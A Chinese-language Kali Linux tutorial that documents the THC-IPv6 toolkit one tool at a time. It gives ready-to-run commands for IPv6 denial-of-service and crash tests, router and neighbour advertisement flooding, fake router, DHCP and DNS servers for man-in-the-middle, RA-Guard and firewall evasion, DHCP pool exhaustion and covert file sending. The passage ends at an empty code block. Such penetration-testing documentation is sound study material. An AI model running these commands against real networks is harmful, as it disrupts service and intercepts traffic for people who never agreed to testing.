Thc-Ipv6攻击工具包 全参数详细解析!Kali Linux入门教程!黑客渗透测试!

简介

用于测试 IPv6 和 ICMPv6 协议弱点的攻击工具包。

其中一些工具包括:

  • alive6:有效的活体扫描。
  • denial6:尝试针对某个对象进行一系列拒绝服务测试目标。
  • detector-new-ip6:检测加入网络的新 ip6 设备。
  • dnsdict6:并行化 dns ipv6 字典暴力破解器。
  • dos-new-ip6:检测新的 ip6 设备并告诉他们他们选择的 IP 在网络上发生冲突 (DOS)。
  • exploit6:针对目标测试已知的 ipv6 漏洞。
  • fake_mld6:在您选择的多播组中宣布自己网。
  • fake_router6:宣布自己是网络上的路由器。
  • Flood_advertise6:用随机邻居广告淹没目标。
  • Flood_router6:用随机路由器通告淹没目标。
  • implementation6:对 ipv6 执行各种实施检查。
  • parasite6:icmp 邻居请求/广告欺骗者。
  • redir6:智能地将流量重定向到您(中间人) 使用聪明的 icmp6 重定向欺骗程序。
  • rsmurf6:远程 smurfer(已知仅适用于 Linux 片刻)。
  • thcping6:发送手工制作的 ping6 数据包。
  • Toobig6:MTU 减小器,具有与 redir6 相同的智能。
  • 等等

安装

thc-ipv6 工具默认安装在 Kali Linux 里面了。也可以通过以下命令进行安装

bash 复制代码
apt install thc-ipv6

使用

1. atk6-address6

将 mac 或 IPv4 地址转换为 IPv6 地址(如果没有提供前缀作为第二个选项,则链接本地),或者在给定 IPv6 地址时,打印 mac 或 IPv4 地址。打印所有可能的变体。如果出现错误或发现的变体数量,则返回 -1

bash 复制代码
atk6-address6 -h

将 IPv6 地址转换为 MAC 地址,反之亦然:

bash 复制代码
atk6-address6 fe80::20c:29ff:fef4:8e14 00:0c:29:f4:8e:14
bash 复制代码
atk6-address6 74:d4:35:4e:39:c8 fe80::76d4:35ff:fe4e:39c8

2. atk6-alive6

有效的活动扫描,将检测所有系统听这个地址

命令行或输入文件中的目标地址可以包含以下形式的范围:

2001:db8::1-fff 或 2001:db8::1-2:0-ffff:0:0-ffff 等。

不要将范围(从-到)选项与 -M、-C 或 -4 一起使用。如果使用 SYN 数据包(-s/-F 选项),则将执行自动操作系统检测。出现错误时返回 -1,如果发现系统处于活动状态则返回 0,如果未发现任何内容则返回 1。

2.1 -h

显示更多命令行选项和帮助(-hh:更多选项)

bash 复制代码
atk6-alive6 -h

2.2 常规使用

bash 复制代码
atk6-alive6 eth0

输出选项

2.3 -i file

从输入文件检查系统

bash 复制代码
atk6-alive6 -i targets.txt eth0

2.4 -o file

将结果写入输出文件

bash 复制代码
atk6-alive6 -o results.txt eth0

2.5 -v

详细信息(两次:详细信息,三次:转储数据包)

bash 复制代码
atk6-alive6 -v eth0

2.6 -V

启用调试输出

bash 复制代码
atk6-alive6 -V eth0

2.7 -d

DNS 解析活动 IPv6 地址

bash 复制代码
atk6-alive6 -d eth0

2.8 -H

打印接收数据包的跳数

bash 复制代码
atk6-alive6 -H eth0

枚举选项

2.9 -M

枚举硬件地址(MAC) 来自输入地址(慢!)

bash 复制代码
atk6-alive6 -M eth0

2.10 -C

枚举输入网络的公共地址,-CC 用于大规模扫描

bash 复制代码
atk6-alive6 -C eth0

2.11 -4 ipv4/range

测试每个网络的各种 IPv4 地址编码(例如 1.2.3.4/24)

bash 复制代码
atk6-alive6 -4 192.168.174.0/24 eth0

2.12 -y step

用于范围扫描(2000::0-f),定义步长范围(默认值:1)

bash 复制代码
atk6-alive6 -y 10 eth0

存活检测选项

2.13 -p

发送 ping 数据包进行活动检查(默认值)

bash 复制代码
atk6-alive6 -p eth0

2.14 -e dst,hop

发送错误数据包:目标(默认值),逐跳

bash 复制代码
atk6-alive6 -e dst eth0

2.15 -s port,port,..

TCP-SYN 数据包到端口进行活动检查或"端口扫描"

bash 复制代码
atk6-alive6 -s 80,443 eth0

2.16 -a port,port,..

TCP-ACK 数据包到端口进行活动检查

bash 复制代码
atk6-alive6 -a 22,25 eth0

2.17 -u port,port,..

UDP 数据包到端口进行活动检查

bash 复制代码
atk6-alive6 -u 53 eth0

2.18 -F

防火墙模式:-p -e dst -u 53 -s 22,25,80,443,9511 -a 9511

bash 复制代码
atk6-alive6 -F eth0

2.19 -R

不考虑TCP-RST 为活动状态(适用于防火墙,例如 -F)

bash 复制代码
atk6-alive6 -R eth0

发送选项

2.20 -n number

发送每个数据包的频率(默认值:本地 1,远程 2)

bash 复制代码
atk6-alive6 -n 3 eth0

2.21 -W time

发送数据包后等待的时间(以毫秒为单位)(默认值:1)

bash 复制代码
atk6-alive6 -W 10 eth0

2.22 -S

慢速模式,为每个远程目标或代理 NA 获取最佳路由器

bash 复制代码
atk6-alive6 -S eth0

2.23 -I src[/mask]

使用指定的 IPv6 地址作为源。使用随机掩码。

bash 复制代码
atk6-alive6 -I fe80::20c:29ff:fef4:8e14 eth0

2.24 -l

使用链路本地地址作为多播地址,而不是全局地址

bash 复制代码
 atk6-alive6 -l eth0

2.25 -P

仅打印将被扫描的地址,不发送任何数据包!

bash 复制代码
atk6-alive6 -P eth0

2.26 -L

本地模式 - 仅执行 NDP 并报告本地系统处于活动状态

bash 复制代码
atk6-alive6 -L eth0

2.27 -r

为每个新目标更新 IPv6 源地址(若无则等待)

bash 复制代码
atk6-alive6 -r eth0

2.28 -T tag

将标记字符串放入 ICMP 数据包中

bash 复制代码
atk6-alive6 -T "TestTag" eth0

2.29 -x port

TCP/UDP 源端口(用于 -s、-a 和 -u)

bash 复制代码
atk6-alive6 -x 12345 eth0

2.30 -Z mac

使用给定的目标 mac 地址

bash 复制代码
atk6-alive6 -Z 00:11:22:33:44:55 eth0

2.31 -m

原始模式(用于没有以太网的网络适配器)

bash 复制代码
atk6-alive6 -m eth0

3. atk6-connect6

您可以为目标 ip 提供 %interface 标识符。连接成功时返回 0,超时/重置时返回 1

3.1 -h

查看帮助

bash 复制代码
atk6-connect6 -h

3.2 常规使用

bash 复制代码
atk6-connect6 fe80::20c:29ff:fef4:8e14%eth0 80

3.3 -a

发送逐跳路由器警报选项

bash 复制代码
atk6-connect6 -a fe80::20c:29ff:fef4:8e14%eth0 80

3.4 -A type

类似于 -a,但允许您定义警报类型(数字)

bash 复制代码
atk6-connect6 -A 5 fe80::20c:29ff:fef4:8e14%eth0 80

3.5 -i

交互模式(如 telnet)

bash 复制代码
atk6-connect6 -i fe80::20c:29ff:fef4:8e14%eth0 80

3.6 -I

结束换行,等待字符串,打印它

bash 复制代码
atk6-connect6 -I fe80::20c:29ff:fef4:8e14%eth0 80

3.7 -O

尝试 TCP 快速打开连接

bash 复制代码
atk6-connect6 -O fe80::20c:29ff:fef4:8e14%eth0 80

3.8 -w ms

等待连接时间(毫秒)(默认值:1000)

bash 复制代码
atk6-connect6 -w 2000 fe80::20c:29ff:fef4:8e14%eth0 80

3.9 -p

ping 模式

bash 复制代码
atk6-connect6 -p fe80::20c:29ff:fef4:8e14%eth0 80

4. atk6-connsplit6

atk6-connsplit6 是 THC-IPv6 工具套件中的一个工具,用于操控 TCP 连接,特别是通过将源地址或目标地址分离,增加连接分析的难度。它专注于监听或操控特定端口上的流量(默认是 64446)。

4.1 -h

bash 复制代码
atk6-connsplit6 -h

4.2 -v

详细模式

4.3 -d

调试模式

bash 复制代码
atk6-connsplit6 -vd eth0 client

5. atk6-covert_send6

将 FILE 的内容秘密发送到目标,并且它的 POC - 不要排除太复杂 - 它只是放入目标标头。

bash 复制代码
atk6-covert_send6 -h

5.1 -m mtu

指定最大 MTU(默认值:接口 MTU,最小值:1000)

bash 复制代码
atk6-covert_send6 -m 1200 eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80

5.2 -k key

使用 Blowfish-160 加密内容

bash 复制代码
atk6-covert_send6 -k mysecretkey eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80

5.3 -s resend

发送每个数据包 RESEND 次数,默认值:1

bash 复制代码
atk6-covert_send6 -s 3 eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80

6. atk6-covert_send6d

将秘密接收的内容写入文件。

bash 复制代码
atk6-covert_send6d -h

-k key

使用 Blowfish-160 解密内容

bash 复制代码
atk6-covert_send6d -k eth0 secret.txt

7. atk6-denial6

对目标执行各种拒绝服务攻击

bash 复制代码
atk6-denial6 -h

如果系统存在漏洞,则可能会崩溃或承受重负载,因此请小心!

当前已实施以下测试用例:

1:带有路由器警报并填充未知选项的大型逐跳报头

2:填充未知选项的大型目标报头

3:带有路由器警报选项的逐跳报头加上 180 个报头

4:带有路由器警报选项的逐跳报头加上 178 个报头 + ping

5:AH 报头 + ping

6:带有带有路由器警报的逐跳报头的 ping 的第一个片段

7:填充未知选项的大型逐跳报头(无路由器警报)

bash 复制代码
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 1
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 2
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 3
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 4
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 5
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 6
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 7

8. atk6-detect-new-ip6

此工具可检测加入本地网络的新 IPv6 地址。

如果提供了脚本,则以检测到的 IPv6 地址作为第一个命令行选项并以接口作为第二个命令行选项来执行。

bash 复制代码
atk6-detect-new-ip6 -h
bash 复制代码
atk6-detect-new-ip6 eth0

9. atk6-detect_sniffer6

测试本地 LAN 上的系统是否正在嗅探。

适用于 Windows、Linux、OS/X 和 *BSD,如果未指定目标,则使用 link-local-all-nodes 地址,但该地址并不总是有效。

bash 复制代码
atk6-detect_sniffer6 -h
bash 复制代码
atk6-detect_sniffer6 eth0

10. atk6-dnsdict6

枚举 DNS 条目的域,如果提供则使用字典文件。否则使用内置列表。此工具基于 gnucitizen.org 的 dnsmap。

bash 复制代码
atk6-dnsdict6 -h

10.1 常规使用

bash 复制代码
atk6-dnsdict6 google.com

10.2 -4

也转储 IPv4 地址

bash 复制代码
atk6-dnsdict6 -4 google.com

10.3 -t NO

指定要使用的线程数(默认值:8,最大值:32)。

bash 复制代码
atk6-dnsdict6 -t 16 google.com

10.4 -D

转储选定的内置单词表,不进行扫描。

bash 复制代码
atk6-dnsdict6 -D google.com

10.5 -d

显示 NS 和 MX DNS 域信息上的 IPv6 信息。

bash 复制代码
atk6-dnsdict6 -d google.com

10.6 -e

忽略域错误的 NS

bash 复制代码
atk6-dnsdict6 -e google.com

10.7 -S

执行 SRV 服务名称猜测

bash 复制代码
atk6-dnsdict6 -S google.com

10.8 -[smlxu]

通过 -s(mall=100)、-m(edium=1419) (默认) 选择字典大小、-l(arge=2601)、-x(treme=5886) 或 -u(ber=16724)

bash 复制代码
atk6-dnsdict6 -smlxu google.com

11. atk6-dnsrevenum6

执行快速反向 DNS 枚举,能够应对速度慢的服务器。

bash 复制代码
atk6-dnsrevenum6 -h

常规使用

bash 复制代码
atk6-dnsrevenum6 dns.test.com 2001:db8:42a8::/48

-t

启用 TCP 而不是 UDP(如果出现多次超时,请使用此选项)

bash 复制代码
atk6-dnsrevenum6 -t dns.test.com 8.a.2.4.8.b.d.0.1.0.0.2.ip6.arpa

12. atk6-dnssecwalk

执行 DNSSEC NSEC 遍历。

bash 复制代码
atk6-dnssecwalk -h

示例

bash 复制代码
 atk6-dnssecwalk dns.test.com google.com

12.1 -e

确保域存在于找到的地址中,否则退出

bash 复制代码
atk6-dnssecwalk -e dns.test.com google.com

12.2 -4

将找到的条目解析为 IPv4 地址

bash 复制代码
atk6-dnssecwalk -4 dns.test.com google.com

12.3 -6

将找到的条目解析为 IPv6 地址

bash 复制代码
atk6-dnssecwalk -6 dns.test.com google.com

12.4 -t

使用 TCP 而不是 UDP

bash 复制代码
atk6-dnssecwalk -t dns.test.com google.com

13. atk6-dos-new-ip6

此工具通过向重复的 ip6 检查 (DAD) 发送答案来阻止新的 IPv6 接口出现。这会导致新的 IPv6 设备出现 DOS。

bash 复制代码
atk6-dos-new-ip6 -h

-S

发送冲突的 NS 查询而不是 NA 回复,但它限制了源随机化。

bash 复制代码
atk6-dos-new-ip6 -S eth0

14. atk6-dump_dhcp6

DHCPv6 信息工具。转储可用服务器及其设置。您可以指定特定的 DHCPv6 服务器作为目标。

bash 复制代码
atk6-dump_dhcp6 -h

14.1 -V

vendorid 发送 vendorid 编号、字符串(例如 11、test)

bash 复制代码
atk6-dump_dhcp6 -V 11 eth0 fe80::20c:29ff:fef4:8e14

14.2 -N

使用 fe80:: 作为源

bash 复制代码
atk6-dump_dhcp6 -N eth0 fe80::20c:29ff:fef4:8e14

14.3 -n

使用空 mac 作为源

bash 复制代码
atk6-dump_dhcp6 -n eth0 fe80::20c:29ff:fef4:8e14

15. atk6-dump_router6

转储所有本地路由器及其信息

bash 复制代码
atk6-dump_router6 -h
bash 复制代码
atk6-dump_router6 eth0

16. atk6-exploit6

在目标上执行各种 CVE 已知 IPv6 漏洞的利用。请注意,对于可利用的溢出,仅使用"AAA..."字符串。如果系统存在漏洞,它将崩溃,所以要小心!

bash 复制代码
atk6-exploit6 -h

通过 eth0 对 fe80::20c:29ff:fef4:8e14 执行漏洞检查:

测试 0:正常 ping6 已通过 - 我们收到回复

测试 1:CVE-NONE 过大 ping,6 个校验和组合

警告:由于目标平台上的实现差异,大于 65535 的数据包的校验和不可靠

测试 2:CVE-NONE 大 ping,3 个校验和组合

警告:由于目标平台上的实现差异,大于 65535 的数据包的校验和不可靠

测试 3:CVE-2003-0429 前缀长度错误(信息很少,实现不确定

测试 4:CVE-2004-0257 ping,在回复时发送过大,然后发送 SYN pkt

测试 5:正常 ping6(仍然有效?)已通过 - 我们收到回复

bash 复制代码
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 0
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 1
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 2
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 3
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 4
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 5

17. atk6-extract_hosts6

在 FILE 中打印 IPv6 地址的主机部分

bash 复制代码
atk6-extract_hosts6 file.txt

18. atk6-extract_networks6

打印在 FILE 中找到的网络

bash 复制代码
atk6-extract_networks6 file.txt

19. atk6-fake_advertise6

在网络上通告 IPv6 地址(如果未指定,则使用自己的 mac),如果未设置目标地址,则将其发送到所有节点多播地址。如果未设置,则源 ip 地址是通告的地址。

bash 复制代码
atk6-fake_advertise6 -h

示例

bash 复制代码
atk6-fake_advertise6 eth0 fe80::20c:29ff:fef4:8e14

发送选项

19.1 -n count

发送多少个数据包(默认值:永远)

bash 复制代码
atk6-fake_advertise6 -n 10 eth0 fe80::20c:29ff:fef4:8e14

19.2 -w seconds

发送数据包之间的等待时间(默认值:5)

bash 复制代码
atk6-fake_advertise6 -w 5 eth0 fe80::20c:29ff:fef4:8e14

19.3 -m srcmac

发送的 srcmac 地址(不是广告的地址!)

bash 复制代码
atk6-fake_advertise6 -m 00:11:22:33:44:55 eth0 fe80::20c:29ff:fef4:8e14

标志选项

19.4 -O

不设置覆盖标志(默认值:开启)

19.5 -r

设置路由器标志(默认值:关闭)

19.6 -s

设置请求标志(默认值:关闭)

bash 复制代码
atk6-fake_advertise6 -Ors eth0 fe80::20c:29ff:fef4:8e14 

ND 安全规避选项(可以组合使用)

19.7 -F

完全规避攻击(不允许使用其他规避选项)

19.8 -H

添加逐跳标头

19.9 -f

添加一次性片段标头(可以多次指定)

bash 复制代码
atk6-fake_advertise6 -f eth0 fe80::20c:29ff:fef4:8e14

19.10 -D

添加大型目标标头以对数据包进行分段。

bash 复制代码
atk6-fake_advertise6 -DHF eth0 fe80::20c:29ff:fef4:8e14

20. atk6-fake_dhcps6

伪 DHCPv6 服务器。用于配置地址并设置 DNS 服务器

bash 复制代码
atk6-fake_dhcps6 -h
bash 复制代码
atk6-fake_dhcps6 eth0 2001:db8:abcd::/64 2001:db8:abcd::1 2001:db8:abcd::2 00:11:22:33:44:55

21. atk6-fake_dns6d

为任何查找请求提供相同 IPv6 地址的虚假 DNS 服务器。如果客户端有固定的 DNS 服务器,则可以将其与 parasite6 一起使用

注意:非常简单的服务器。不支持数据包中的多个查询、NS、MX 等查找。

bash 复制代码
atk6-fake_dns6d -h
bash 复制代码
atk6-fake_dns6d eth0 fe80::20c:29ff:fef4:8e14

22. atk6-fake_dnsupdate6

发送虚假 DNS 更新请求。

bash 复制代码
atk6-fake_dnsupdate6 -h
bash 复制代码
 atk6-fake_dnsupdate6 dns.test.com myhost.sub.test.com fe80::20c:29ff:fef4:8e14

23. atk6-fake_mipv6

如果移动 IPv6 home-agent 被错误配置为接受没有 IPSEC 的 MIPV6 更新,这会将所有 home-address 的数据包重定向到 care-of-address

bash 复制代码
atk6-fake_mipv6 -h
bash 复制代码
atk6-fake_mipv6 eth0 2001:db8:abcd::1 2001:db8:abcd::2 2001:db8:abcd::3

24. atk6-fake_mld26

这使用 MLDv2 协议。只有协议能够执行的部分功能可以通过命令行实现。如果您需要,请对其进行编码。

bash 复制代码
atk6-fake_mld26 -h

-l

在网络上查询谁在监听多播地址,循环并发送(间隔 5 秒),直到按下 Control-C。

bash 复制代码
atk6-fake_mld26 -l eth0 add fe80::20c:29ff:fef4:8e14
atk6-fake_mld26 -l eth0 delete fe80::20c:29ff:fef4:8e14
atk6-fake_mld26 -l eth0 query fe80::20c:29ff:fef4:8e14

25. atk6-fake_mld6

在您选择的多播组中发布或删除您自己或您想要的任何人

bash 复制代码
atk6-fake_mld6 -h

-l

在网络上查询谁在监听多播地址, 循环发送(间隔 5 秒),直到按下 Control-C。

bash 复制代码
atk6-fake_mld6 -l eth0 add fe80::20c:29ff:fef4:8e14
atk6-fake_mld6 -l eth0 delete fe80::20c:29ff:fef4:8e14
atk6-fake_mld6 -l eth0 query fe80::20c:29ff:fef4:8e14

26. atk6-fake_mldrouter6

宣布、删除或请求 MLD 路由器 - 自己或其他。

bash 复制代码
atk6-fake_mldrouter6 -h

-l

使用 -l 循环发送(以 5 秒为间隔),直到按下 Control-C。

bash 复制代码
atk6-fake_mldrouter6 -l eth0 advertise fe80::20c:29ff:fef4:8e14
atk6-fake_mldrouter6 -l eth0 solicitate fe80::20c:29ff:fef4:8e14
atk6-fake_mldrouter6 -l eth0 terminate fe80::20c:29ff:fef4:8e14

27. atk6-fake_pim6

hello 命令可选地采用 DR 优先级(默认值:0)。

join 和 prune 命令需要要修改的多播组、加入或离开的目标地址和邻居 PIM 路由器

bootstrap 命令需要 bootstraprouter 地址和可选的优先级和会合点。

assert 命令需要相关的多播地址和可选的度量和多播发送者。

bash 复制代码
atk6-fake_pim6 -h

27.1 -l

每 5 秒循环数据包

bash 复制代码
atk6-fake_pim6 -l eth0 hello

27.2 -f

泛洪数据包(在有用的地方使用随机值,例如 src)

bash 复制代码
atk6-fake_pim6 -f eth0 bootstrap fe80::1 5 ff05::2

27.3 -t

ttl 指定非标准 ttl

bash 复制代码
atk6-fake_pim6 -t eth0 assert ff05::2 10 fe80::2

27.4 -s src6

指定源 IPv6 地址

bash 复制代码
atk6-fake_pim6 -s eth0 join fe80::1 ff05::2 ff05::1

27.5 -d dst6

指定非标准目标 IPv6 地址

bash 复制代码
atk6-fake_pim6 -d eth0 join fe80::1 ff05::2 ff05::1

28. atk6-fake_router26

与 fake_router6 类似,但有更多可用选项。

bash 复制代码
atk6-fake_router26 -h

28.1 -A network/prefix

添加自动配置网络(最多 16 次)

28.2 -a seconds

前缀 -A 的有效生存期(默认为 99999)

bash 复制代码
atk6-fake_router26 -A 2001:db8:1::/64 -a 3600 eth0

28.3 -R network/prefix

添加路由条目(最多 16 次)

28.4 -r seconds

路由条目 -R 的生存期(默认为 4096)

bash 复制代码
atk6-fake_router26 -R 2001:db8:1::/64 -r 3600 eth0

28.5 -D dns-server

指定 DNS 服务器(最多到 16 次)

bash 复制代码
atk6-fake_router26 -D 2001:4860:4860::8888 eth0

28.6 -L searchlist

指定 DNS 域搜索列表,使用 , 分隔条目

bash 复制代码
atk6-fake_router26 -L dnslist eth0

28.7 -d seconds

-D 的 dns 条目生存期 (默认为 4096)

bash 复制代码
atk6-fake_router26 -D 2001:4860:4860::8888 -d 3600 eth0

28.8 -M mtu

要发送的 MTU,默认为接口设置

bash 复制代码
atk6-fake_router26 -M 50 eth0

28.9 -s sourceip

路由器的源 ip,默认为本地链接

28.10 -S sourcemac

路由器的源 mac,默认为接口

bash 复制代码
atk6-fake_router26 -s fe80::1 -S 00:11:22:33:44:55 eth0

28.11 -f ethernetmac

用于发送帧的以太网 mac 地址

bash 复制代码
atk6-fake_router26 -f fe80::1 eth0

28.12 -l seconds

路由器生存期 (默认为 2048)

bash 复制代码
atk6-fake_router26 -l 30 eth0

28.13 -T ms

可达计时器 (默认为 0)

bash 复制代码
atk6-fake_router26 -T 3000 eth0

28.14 -t ms

重传计时器 (默认为 0)

bash 复制代码
atk6-fake_router26 -t 3000 eth0

28.15 -p priority

优先级"low(低)"、"medium(中)"、"high(高)"(默认)、"reserved(保留)"

bash 复制代码
atk6-fake_router26 -p medium eth0

28.16 -F flags

设置以下一个或多个标志:managed、other、homeagent、proxy、reserved;以逗号分隔

bash 复制代码
atk6-fake_router26 -F managed eth0

28.17 -E type

路由器广告防护规避选项。类型:

F 完全规避(Windows 和 FreeBSD)

H 简单的逐跳报头

1 简单的一次性碎片报头(可以添加多个)

D 插入一个大目标报头,以便它碎片化

O 保持第一目标的重叠碎片(Win、BSD、Mac)

o 保持最后目标的重叠碎片(Linux、Solaris)

bash 复制代码
atk6-fake_router26 -E H111 eth0
atk6-fake_router26 -E D eth0

28.18 -m mac-address

如果只有一台机器应该接收 RA(不与 -E DoO 一起使用)

bash 复制代码
atk6-fake_router26 -m 00:11:22:33:44:55 eth0

28.19 -i interval

RA 数据包之间的时间(默认值:5)

bash 复制代码
atk6-fake_router26 -i 10 eth0

28.20 -n number

要发送的 RA 数量(默认值:无限制)

bash 复制代码
atk6-fake_router26 -n 100 eth0

28.21 -X

通过取消宣布假路由器进行清理(默认值:禁用)

bash 复制代码
atk6-fake_router26 -X eth0

29. atk6-fake_router6

宣布自己是路由器并尝试成为默认路由器。如果提供了不存在的链路本地或 mac 地址,则会导致 DOS。

bash 复制代码
atk6-fake_router6 -h

-H 添加逐跳、-F 分段标头和 -D dst 标头。

bash 复制代码
atk6-fake_router6 -HFD eth0 2001:db8::/64

30. atk6-fake_solicitate6

在网络上复制 IPv6 地址,并将其发送到所有节点多播地址

bash 复制代码
atk6-fake_solicitate6 -h
bash 复制代码
atk6-fake_solicitate6 eth0 fe80::20c:29ff:fef4:8e14

31. atk6-firewall6

执行各种 ACL 绕过尝试以检查实现。

bash 复制代码
atk6-firewall6 -h

默认为 TCP 端口,选项 -u 切换到 UDP。选项 -H 打印跳数。要使所有测试用例都能正常工作,必须允许对目标进行 ICMPv6 ping。

bash 复制代码
atk6-firewall6 -Hu eth0 fe80::20c:29ff:fef4:8e14 80

32. atk6-flood_advertise6

用邻居广告淹没本地网络。

bash 复制代码
atk6-flood_advertise6 -h

选项 -k 使用您的真实 src mac 发送,-m 使用指定的 src mac 发送,否则每个数据包随机发送。

bash 复制代码
atk6-flood_advertise6 -k eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_advertise6 -m 00:11:22:33:44:55 eth0 fe80::20c:29ff:fef4:8e14

33. atk6-flood_dhcpc6

DHCP 客户端泛洪器。用于耗尽 DHCP6 服务器提供的 IP 地址池。注意:如果池很大,这毫无意义。:-)

bash 复制代码
atk6-flood_dhcpc6 -h

默认情况下,链路本地 IP MAC 地址是随机的,但在某些情况下这不起作用。

-n 将使用真实 MAC,-N 将使用真实 MAC 和链路本地地址。-1 将仅请求地址但不请求它。

如果未使用 -N,则应并行运行 parasite6。使用 -d 强制 DNS 更新,您必须指定域名。

bash 复制代码
atk6-flood_dhcpc6 -n -1 -d google.com eth0
atk6-flood_dhcpc6 -N -1 -d google.com eth0

34. atk6-flood_mld26

使用 MLDv2 报告淹没本地网络。

bash 复制代码
atk6-flood_mld26 -h
bash 复制代码
atk6-flood_mld26 eth0 fe80::20c:29ff:fef4:8e14 20 

35. atk6-flood_mld6

使用 MLD 报告淹没本地网络。

bash 复制代码
atk6-flood_mld6 -h
bash 复制代码
atk6-flood_mld6 eth0 fe80::20c:29ff:fef4:8e14

36. atk6-flood_mldrouter6

使用 MLD 路由器广告淹没本地网络。

bash 复制代码
atk6-flood_mldrouter6 -h
bash 复制代码
atk6-flood_mldrouter6 eth0 fe80::20c:29ff:fef4:8e14

37. atk6-flood_redir6

使用 ICMPv6 重定向数据包淹没本地网络。

bash 复制代码
atk6-flood_redir6 -h

-F/-D/-H 添加 fragment/destination/hopbyhop 标头以绕过简单过滤器

-a 添加带有路由器警报的 hopbyhop

bash 复制代码
atk6-flood_redir6 -HFD -a eth0

38. atk6-flood_router26

与 flood_router6 类似,但有更多选项可用。用路由器广告淹没本地网络。每个数据包包含 ~25 个前缀和路由条目

bash 复制代码
atk6-flood_router26 -h

模式:默认发送路由条目和前缀信息

38.1 -R

仅发送路由条目,不发送前缀信息

bash 复制代码
atk6-flood_router26 -R eth0 fe80::20c:29ff:fef4:8e14

38.2 -P

仅发送前缀信息,不发送路由条目

bash 复制代码
atk6-flood_router26 -P eth0 fe80::20c:29ff:fef4:8e14

38.3 -A

禁用隐私扩展的攻击

bash 复制代码
atk6-flood_router26 -A eth0 fe80::20c:29ff:fef4:8e14

选项

38.4 -a

添加带有路由器警报的 hopbyhop 标头

bash 复制代码
atk6-flood_router26 -a eth0 fe80::20c:29ff:fef4:8e14

38.5 -H

添加 hopbyhop 标头以绕过 RA 防护安全

bash 复制代码
atk6-flood_router26 -H eth0 fe80::20c:29ff:fef4:8e14

38.6 -f

添加原子片段标头以绕过 RA 防护安全

bash 复制代码
atk6-flood_router26 -f eth0 fe80::20c:29ff:fef4:8e14

38.7 -D

添加大型目标标头以绕过 RA 防护安全

bash 复制代码
atk6-flood_router26 -D eth0 fe80::20c:29ff:fef4:8e14

38.8 -F

执行完整的 RA 防护规避(不允许所有其他绕过选项)

bash 复制代码
atk6-flood_router26 -F eth0 fe80::20c:29ff:fef4:8e14

38.9 -s

使用较小的生命周期,导致更具破坏性的影响

bash 复制代码
atk6-flood_router26 -s eth0 fe80::20c:29ff:fef4:8e14

38.10 -S

执行缓慢启动,这会增加影响

bash 复制代码
atk6-flood_router26 -S eth0 fe80::20c:29ff:fef4:8e14

38.11 -G

64kb 前缀/路由条目的巨型数据包

bash 复制代码
atk6-flood_router26 -G eth0 fe80::20c:29ff:fef4:8e14

38.12 -m

将 DHCPv6 管理/其他标志添加到 RA

bash 复制代码
atk6-flood_router26 -m eth0 fe80::20c:29ff:fef4:8e14

39. atk6-flood_router6

用路由器广告淹没本地网络。

bash 复制代码
atk6-flood_router6 -h

-F/-D/-H 添加 fragment/destination/hopbyhop 标头以绕过 RA 保护安全。

bash 复制代码
atk6-flood_router6 -HFD eth0

40. atk6-flood_rs6

使用 ICMPv6 路由器请求数据包淹没本地网络。

bash 复制代码
atk6-flood_rs6 -h

选项 -s 使用随机源 IPv6 地址。选项 -S 还会随机化 MAC。

bash 复制代码
atk6-flood_rs6 -sS eth0

41. atk6-flood_solicitate6

使用邻居请求向网络发送洪泛消息。

bash 复制代码
atk6-flood_solicitate6 -h
bash 复制代码
atk6-flood_solicitate6 -k eth0
atk6-flood_solicitate6 -m 00:11:22:33:44:55 eth0
atk6-flood_solicitate6 -a eth0

42. atk6-flood_unreach6

使用 ICMPv6 不可达数据包淹没目标。

bash 复制代码
atk6-flood_unreach6 -h

42.1 -F/-D/-H

添加 fragment/destination/hopbyhop 标头以绕过简单过滤器

bash 复制代码
atk6-flood_unreach6 -F eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -D eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -H eth0 fe80::20c:29ff:fef4:8e14

42.2 -p/-h

发送端口/主机不可达而不是网络不可达

bash 复制代码
atk6-flood_unreach6 -p eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -h eth0 fe80::20c:29ff:fef4:8e14

42.3 -r/-R

从 /64 随机化源 / 完全随机化源

bash 复制代码
atk6-flood_unreach6 -r eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -R eth0 fe80::20c:29ff:fef4:8e14

43. atk6-four2six

将 IPv4 数据包发送到 IPv6 4to6 网关。如果指定了端口,则发送 UDP 数据包,否则发送 ICMPv4 ping。

bash 复制代码
atk6-four2six -h

43.1 -F

插入原子片段报头(可多次设置)

bash 复制代码
atk6-four2six -F eth0 2001:db8::1 192.168.1.2 192.168.1.3

43.2 -H

插入并清空逐跳报头

bash 复制代码
atk6-four2six -H eth0 2001:db8::1 192.168.1.2 192.168.1.3

43.3 -D

插入将数据包分段的大型目标报头

bash 复制代码
atk6-four2six -D eth0 2001:db8::1 192.168.1.2 192.168.1.3

43.4 -p srcport

设置特定的 UDP 源端口或 Ping ID

bash 复制代码
atk6-four2six -p 12345 eth0 2001:db8::1 192.168.1.2 192.168.1.3 53

43.5 -s src6

设置特定的 IPv6 源地址

bash 复制代码
sudo atk6-four2six -s 2001:db8::100 eth0 2001:db8::1 192.168.1.2 192.168.1.3

43.6 -m srcmac

设置特定的 MAC 源地址

bash 复制代码
atk6-four2six -m 00:11:22:33:44:55 eth0 2001:db8::1 192.168.1.2 192.168.1.3

44. atk6-fragmentation6

执行片段防火墙和实施检查,包括拒绝服务。

bash 复制代码
atk6-fragmentation6 -h

-f 激活泛洪模式,发送之间无暂停;-p 禁用第一次和最后一次 ping,-n number 指定每次测试的执行频率

bash 复制代码
